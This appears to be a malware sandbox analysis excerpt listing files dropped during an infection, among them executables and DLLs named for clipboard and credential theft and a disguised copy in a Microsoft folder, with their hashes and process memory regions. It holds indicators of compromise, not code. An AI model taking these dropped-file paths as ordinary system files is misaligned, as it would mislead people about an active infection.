C:\Users\Admin\AppData\Local\Temp\ss31.exeFilesize
592KB
MD5f7f9e101d55de528903e5214db5abe48
SHA170d276e53fb4bf479cf7c229a1ada9f72ccc344e
SHA2562b8975d530e037d398ef15d6e53345672e2c23c8ed99d9efb4a75503353b39f4
SHA512d3960fdb74bb86247077c239cf9b9643212ba71a5f0fed2c2134d50712442373227ad4fd80e7f1f125da0e082a026355a5179da7de69acb21ff9ea7869bfb05b
-
C:\Users\Admin\AppData\Local\Temp\ss31.exeFilesize
592KB
MD5f7f9e101d55de528903e5214db5abe48
SHA170d276e53fb4bf479cf7c229a1ada9f72ccc344e
SHA2562b8975d530e037d398ef15d6e53345672e2c23c8ed99d9efb4a75503353b39f4
SHA512d3960fdb74bb86247077c239cf9b9643212ba71a5f0fed2c2134d50712442373227ad4fd80e7f1f125da0e082a026355a5179da7de69acb21ff9ea7869bfb05b
-
C:\Users\Admin\AppData\Local\f84f54cb-a1d1-4455-8ef3-853e11585eba\build3.exeFilesize
9KB
MD59ead10c08e72ae41921191f8db39bc16
SHA1abe3bce01cd34afc88e2c838173f8c2bd0090ae1
SHA2568d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
SHA512aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a
-
C:\Users\Admin\AppData\Local\f84f54cb-a1d1-4455-8ef3-853e11585eba\build3.exeFilesize
9KB
MD59ead10c08e72ae41921191f8db39bc16
SHA1abe3bce01cd34afc88e2c838173f8c2bd0090ae1
SHA2568d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
SHA512aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a
-
C:\Users\Admin\AppData\Local\f84f54cb-a1d1-4455-8ef3-853e11585eba\build3.exeFilesize
9KB
MD59ead10c08e72ae41921191f8db39bc16
SHA1abe3bce01cd34afc88e2c838173f8c2bd0090ae1
SHA2568d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
SHA512aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a
-
C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\clip64.dllFilesize
89KB
MD5d3074d3a19629c3c6a533c86733e044e
SHA15b15823311f97036dbaf4a3418c6f50ffade0eb9
SHA256b1f486289739badf85c2266b7c2bbbc6c620b05a6084081d09d0911c51f7c401
SHA5127dd731fd26085d2a4f3963acd758a42a457e355117b50478bc053180cb189f5f3428806e29d29adfb96370067ff45e36950842de18b658524b72019027be62cf
-
C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\clip64.dllFilesize
89KB
MD5d3074d3a19629c3c6a533c86733e044e
SHA15b15823311f97036dbaf4a3418c6f50ffade0eb9
SHA256b1f486289739badf85c2266b7c2bbbc6c620b05a6084081d09d0911c51f7c401
SHA5127dd731fd26085d2a4f3963acd758a42a457e355117b50478bc053180cb189f5f3428806e29d29adfb96370067ff45e36950842de18b658524b72019027be62cf
-
C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\clip64.dllFilesize
89KB
MD5d3074d3a19629c3c6a533c86733e044e
SHA15b15823311f97036dbaf4a3418c6f50ffade0eb9
SHA256b1f486289739badf85c2266b7c2bbbc6c620b05a6084081d09d0911c51f7c401
SHA5127dd731fd26085d2a4f3963acd758a42a457e355117b50478bc053180cb189f5f3428806e29d29adfb96370067ff45e36950842de18b658524b72019027be62cf
-
C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dllFilesize
1.0MB
MD52c4e958144bd089aa93a564721ed28bb
SHA138ef85f66b7fdc293661e91ba69f31598c5b5919
SHA256b597b1c638ae81f03ec4baafa68dda316d57e6398fe095a58ecc89e8bcc61855
SHA512a0e3b82bbb458018e368cb921ed57d3720945e7e7f779c85103370a1ae65ff0120e1b5bad399b9315be5c3e970795734c8a82baf3783154408be635b860ee9e6
-
C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dllFilesize
1.0MB
MD52c4e958144bd089aa93a564721ed28bb
SHA138ef85f66b7fdc293661e91ba69f31598c5b5919
SHA256b597b1c638ae81f03ec4baafa68dda316d57e6398fe095a58ecc89e8bcc61855
SHA512a0e3b82bbb458018e368cb921ed57d3720945e7e7f779c85103370a1ae65ff0120e1b5bad399b9315be5c3e970795734c8a82baf3783154408be635b860ee9e6
-
C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dllFilesize
1.0MB
MD52c4e958144bd089aa93a564721ed28bb
SHA138ef85f66b7fdc293661e91ba69f31598c5b5919
SHA256b597b1c638ae81f03ec4baafa68dda316d57e6398fe095a58ecc89e8bcc61855
SHA512a0e3b82bbb458018e368cb921ed57d3720945e7e7f779c85103370a1ae65ff0120e1b5bad399b9315be5c3e970795734c8a82baf3783154408be635b860ee9e6
-
C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dllFilesize
1.0MB
MD52c4e958144bd089aa93a564721ed28bb
SHA138ef85f66b7fdc293661e91ba69f31598c5b5919
SHA256b597b1c638ae81f03ec4baafa68dda316d57e6398fe095a58ecc89e8bcc61855
SHA512a0e3b82bbb458018e368cb921ed57d3720945e7e7f779c85103370a1ae65ff0120e1b5bad399b9315be5c3e970795734c8a82baf3783154408be635b860ee9e6
-
C:\Users\Admin\AppData\Roaming\JGAbA.batFilesize
353KB
MD5af643a91b3c089c5d218eacb83898402
SHA196a72f7fa4c88e3a6227e8e2601c6b281c91d87f
SHA256800cee019cdcc9bd60835c0728738f489383e11cf90db7722783841f6d0104b7
SHA51242230e05d5f3c20fde8f743f8fb11ef6cfe93b28c6c6d55743309226c43ed2d4507b836177d4c375333c0d5b393747bba58001c765593cab5f2f05024b1a170d
-
C:\Users\Admin\AppData\Roaming\JGAbA.bat.exeFilesize
423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
C:\Users\Admin\AppData\Roaming\JGAbA.bat.exeFilesize
423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
C:\Users\Admin\AppData\Roaming\JGAbA.vbsFilesize
128B
MD56ad7dabd234d570ed38f59487851aa90
SHA1f273889c33ad99f0b4e7d75640f411a7211033ce
SHA25649fbfe68ecad6088f699ddd85f8303af050704eb1860c4c601c8fe2a8999469c
SHA512c9f02122b9946bd2b1a03ff4dc493a1a879c609e61a2c5423588fb2f5ef3e24306008db1292bd1564ad235408f6abc6405c10adaafb655844318ba6cfb344ba5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeFilesize
9KB
MD59ead10c08e72ae41921191f8db39bc16
SHA1abe3bce01cd34afc88e2c838173f8c2bd0090ae1
SHA2568d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
SHA512aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeFilesize
9KB
MD59ead10c08e72ae41921191f8db39bc16
SHA1abe3bce01cd34afc88e2c838173f8c2bd0090ae1
SHA2568d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
SHA512aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a
-
C:\Users\Admin\AppData\Roaming\vffsbivFilesize
259KB
MD5207c334a91a12299e376c22995479de3
SHA151936c1ecf3525c88e924656d2e83c3cee3b0e42
SHA2566812deb6d1f5c8a6c4ffffdadf4372cc78626fdddda416084f82ddd167a6ff1d
SHA512133d8affbe0dd0661c9f48692fa38c951d21a4327eda0db474cdf6014943bfa0b605a458a33191e821c3e15150c986975e53cbd7a25633f9d7b3f7f8cfec096f
-
C:\Users\Admin\AppData\Roaming\vwfsbivFilesize
259KB
MD5dab7f5c16d3e413a803bf720f9d51cbb
SHA1dd1a42dc9d8da48627914baf08deab51f5c44687
SHA256d3c2e2eb1751e0017a6bcbdb81494f52c80a675d3d4d3d7dfce16be57d776b80
SHA51202e27f601a531d6543b6f16be776bbf08714218ed599ae9fd5e04d87acf176da74fc8cf075d796fc36f240ce677c43b68a3a6e0d3ac1fb788c98c825885c8d7c
-
memory/100-231-0x0000000000AA0000-0x0000000000F30000-memory.dmpFilesize
4.6MB
-
memory/216-1195-0x0000000000D50000-0x0000000000D59000-memory.dmpFilesize
36KB
-
memory/216-1194-0x0000000002340000-0x0000000002350000-memory.dmpFilesize
64KB
-
memory/832-175-0x0000000000400000-0x0000000002B72000-memory.dmpFilesize
39.4MB
-
memory/1460-1187-0x0000000002340000-0x0000000002350000-memory.dmpFilesize
64KB
-
memory/1460-1188-0x0000000001200000-0x000000000120B000-memory.dmpFilesize
44KB
-
memory/1668-1228-0x0000000004BC0000-0x0000000004BD0000-memory.dmpFilesize
64KB
-
memory/1668-1229-0x0000000000850000-0x0000000000859000-memory.dmpFilesize
36KB
-
memory/1916-136-0x0000000000400000-0x0000000002B71000-memory.dmpFilesize
39.4MB
-
memory/1916-1200-0x0000000000CB0000-0x0000000000CBC000-memory.dmpFilesize
48KB
-
memory/1916-1199-0x0000000000D50000-0x0000000000D59000-memory.dmpFilesize
36KB
-
memory/1916-134-0x0000000002D10000-0x0000000002D19000-memory.dmpFilesize
36KB
-
memory/2136-155-0x0000000004A10000-0x0000000004B2B000-memory.dmpFilesize
1.1MB
-
memory/2172-309-0x0000000002D70000-0x0000000002D80000-memory.dmpFilesize
64KB
-
memory/2172-294-0x0000000002D70000-0x0000000002D80000-memory.dmpFilesize
64KB
-
memory/2172-310-0x0000000002D70000-0x0000000002D80000-memory.dmpFilesize
64KB
-
memory/2172-223-0x00000000078E0000-0x00000000078F6000-memory.dmpFilesize
88KB
-
memory/2172-308-0x0000000002D70000-0x0000000002D80000-memory.dmpFilesize
64KB
-
memory/2172-299-0x0000000002D70000-0x0000000002D80000-memory.dmpFilesize
64KB
-
memory/2172-188-0x00000000078B0000-0x00000000078C6000-memory.dmpFilesize
88KB
-
memory/2172-300-0x0000000002D70000-0x0000000002D80000-memory.dmpFilesize
64KB
-
memory/2172-135-0x0000000000880000-0x0000000000896000-memory.dmpFilesize
88KB
-
memory/2172-293-0x0000000002D70000-0x0000000002D80000-memory.dmpFilesize
64KB
-
memory/2172-307-0x0000000002D70000-0x0000000002D80000-memory.dmpFilesize
64KB
-
memory/2172-298-0x0000000002D70000-0x0000000002D80000-memory.dmpFilesize
64KB
-
memory/2172-296-0x0000000002D70000-0x0000000002D80000-memory.dmpFilesize
64KB
-
memory/2172-306-0x0000000002D70000-0x0000000002D80000-memory.dmpFilesize
64KB
-
memory/2172-305-0x0000000002D70000-0x0000000002D80000-memory.dmpFilesize
64KB
-
memory/2172-297-0x0000000002D70000-0x0000000002D80000-memory.dmpFilesize
64KB
-
memory/2172-301-0x0000000002D70000-0x0000000002D80000-memory.dmpFilesize
64KB
-
memory/2172-302-0x0000000008110000-0x0000000008120000-memory.dmpFilesize
64KB
-
memory/2172-304-0x0000000002D70000-0x0000000002D80000-memory.dmpFilesize
64KB
-
memory/2172-303-0x0000000002D70000-0x0000000002D80000-memory.dmpFilesize
64KB
-
memory/2348-161-0x0000000000780000-0x0000000000789000-memory.dmpFilesize
36KB
-
memory/2348-189-0x0000000000400000-0x0000000000704000-memory.dmpFilesize
3.0MB
-
memory/2668-1243-0x0000000004BC0000-0x0000000004BD0000-memory.dmpFilesize
64KB
-
memory/2668-1226-0x0000000004BC0000-0x0000000004BD0000-memory.dmpFilesize
64KB
-
memory/2668-1231-0x0000000006F00000-0x0000000006F32000-memory.dmpFilesize
200KB
-
memory/2668-1232-0x0000000071290000-0x00000000712DC000-memory.dmpFilesize
304KB
-
memory/2668-1242-0x0000000006460000-0x000000000647E000-memory.dmpFilesize
120KB
-
memory/2668-1246-0x000000007F970000-0x000000007F980000-memory.dmpFilesize
64KB
-
memory/3136-213-0x0000000000860000-0x0000000000869000-memory.dmpFilesize
36KB
-
memory/3136-225-0x0000000000400000-0x0000000000704000-memory.dmpFilesize
3.0MB
-
memory/3232-1191-0x00000000007F0000-0x00000000007FF000-memory.dmpFilesize
60KB
-
memory/3232-1189-0x0000000001200000-0x000000000120B000-memory.dmpFilesize
44KB
-
memory/3572-222-0x0000000000400000-0x0000000002B72000-memory.dmpFilesize
39.4MB
-
memory/3620-1148-0x000002DE9EA20000-0x000002DE9EA42000-memory.dmpFilesize
136KB
-
memory/3748-187-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/3748-185-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/3748-186-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/3748-180-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/3748-200-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/3748-202-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/3748-203-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/3748-217-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/3748-179-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/3748-295-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/3860-343-0x0000000004D00000-0x0000000004D52000-memory.dmpFilesize
328KB
-
memory/3860-1145-0x0000000004DD0000-0x0000000004DE0000-memory.dmpFilesize
64KB
-
memory/3860-1132-0x0000000006D70000-0x0000000006DE6000-memory.dmpFilesize
472KB
-
memory/3860-1134-0x0000000006EF0000-0x0000000006F40000-memory.dmpFilesize
320KB
-
memory/3860-1131-0x0000000006CB0000-0x0000000006D42000-memory.dmpFilesize
584KB
-
memory/3860-322-0x00000000009C0000-0x0000000000A22000-memory.dmpFilesize
392KB
-
memory/3860-1130-0x0000000005E50000-0x0000000005EB6000-memory.dmpFilesize
408KB
-
memory/3860-1129-0x0000000005B70000-0x0000000005BAC000-memory.dmpFilesize
240KB
-
memory/3860-323-0x0000000004DD0000-0x0000000004DE0000-memory.dmpFilesize
64KB
-
memory/3860-325-0x0000000004DE0000-0x0000000005384000-memory.dmpFilesize
5.6MB
-
memory/3860-1128-0x0000000004DD0000-0x0000000004DE0000-memory.dmpFilesize
64KB
-
memory/3860-1126-0x0000000005A20000-0x0000000005B2A000-memory.dmpFilesize
1.0MB
-
memory/3860-1125-0x0000000005A00000-0x0000000005A12000-memory.dmpFilesize
72KB
-
memory/3860-324-0x0000000004DD0000-0x0000000004DE0000-memory.dmpFilesize
64KB
-
memory/3860-1133-0x0000000006E30000-0x0000000006E4E000-memory.dmpFilesize
120KB
-
memory/3860-1146-0x0000000004DD0000-0x0000000004DE0000-memory.dmpFilesize
64KB
-
memory/3860-1124-0x0000000005390000-0x00000000059A8000-memory.dmpFilesize
6.1MB
-
memory/3860-1147-0x0000000004DD0000-0x0000000004DE0000-memory.dmpFilesize
64KB
-
memory/3860-345-0x0000000004D00000-0x0000000004D52000-memory.dmpFilesize
328KB
-
memory/3860-326-0x0000000004DD0000-0x0000000004DE0000-memory.dmpFilesize
64KB
-
memory/3860-341-0x0000000004D00000-0x0000000004D52000-memory.dmpFilesize
328KB
-
memory/3860-339-0x0000000004D00000-0x0000000004D52000-memory.dmpFilesize
328KB
-
memory/3860-334-0x0000000004D00000-0x0000000004D52000-memory.dmpFilesize
328KB
-
memory/3860-332-0x0000000004D00000-0x0000000004D52000-memory.dmpFilesize
328KB
-
memory/3860-1136-0x0000000007110000-0x000000000763C000-memory.dmpFilesize
5.2MB
-
memory/3860-1135-0x0000000006F40000-0x0000000007102000-memory.dmpFilesize
1.8MB
-
memory/3860-330-0x0000000004D00000-0x0000000004D52000-memory.dmpFilesize
328KB
-
memory/3860-328-0x0000000004D00000-0x0000000004D52000-memory.dmpFilesize
328KB
-
memory/3860-327-0x0000000004D00000-0x0000000004D52000-memory.dmpFilesize
328KB
-
memory/3872-286-0x00000000027F0000-0x0000000002963000-memory.dmpFilesize
1.4MB
-
memory/3872-313-0x0000000002970000-0x0000000002AA4000-memory.dmpFilesize
1.2MB
-
memory/3872-287-0x0000000002970000-0x0000000002AA4000-memory.dmpFilesize
1.2MB
-
memory/4008-312-0x00007FF71F3C0000-0x00007FF71F77D000-memory.dmpFilesize
3.7MB
-
memory/4232-173-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/4232-162-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/4232-156-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/4232-154-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/4232-149-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/4256-1223-0x00000000025D0000-0x00000000025E0000-memory.dmpFilesize
64KB
-
memory/4256-1222-0x00000000025D0000-0x00000000025E0000-memory.dmpFilesize
64KB
-
memory/4772-1225-0x0000000000850000-0x0000000000877000-memory.dmpFilesize
156KB
-
memory/4772-1224-0x00000000025D0000-0x00000000025E0000-memory.dmpFilesize
64KB
-
memory/4876-1169-0x0000000002340000-0x0000000002350000-memory.dmpFilesize
64KB
-
memory/4876-1168-0x0000000002340000-0x0000000002350000-memory.dmpFilesize
64KB
-
memory/4876-1167-0x00000000022E0000-0x0000000002316000-memory.dmpFilesize
216KB
-
memory/4876-1182-0x00000000056E0000-0x0000000005746000-memory.dmpFilesize
408KB
-
memory/4876-1171-0x0000000004F00000-0x0000000005528000-memory.dmpFilesize
6.2MB
-
memory/4876-1172-0x0000000004D50000-0x0000000004D72000-memory.dmpFilesize
136KB
-
memory/4876-1197-0x0000000006260000-0x000000000627A000-memory.dmpFilesize
104KB
-
memory/4876-1196-0x0000000008320000-0x000000000899A000-memory.dmpFilesize
6.5MB
-
memory/4876-1193-0x0000000002340000-0x0000000002350000-memory.dmpFilesize
64KB
-
memory/4876-1184-0x0000000005C80000-0x0000000005C9E000-memory.dmpFilesize
120KB
-
memory/4960-1245-0x0000000000850000-0x000000000085B000-memory.dmpFilesize
44KB
-
memory/4960-1244-0x0000000004BC0000-0x0000000004BD0000-memory.dmpFilesize
64KB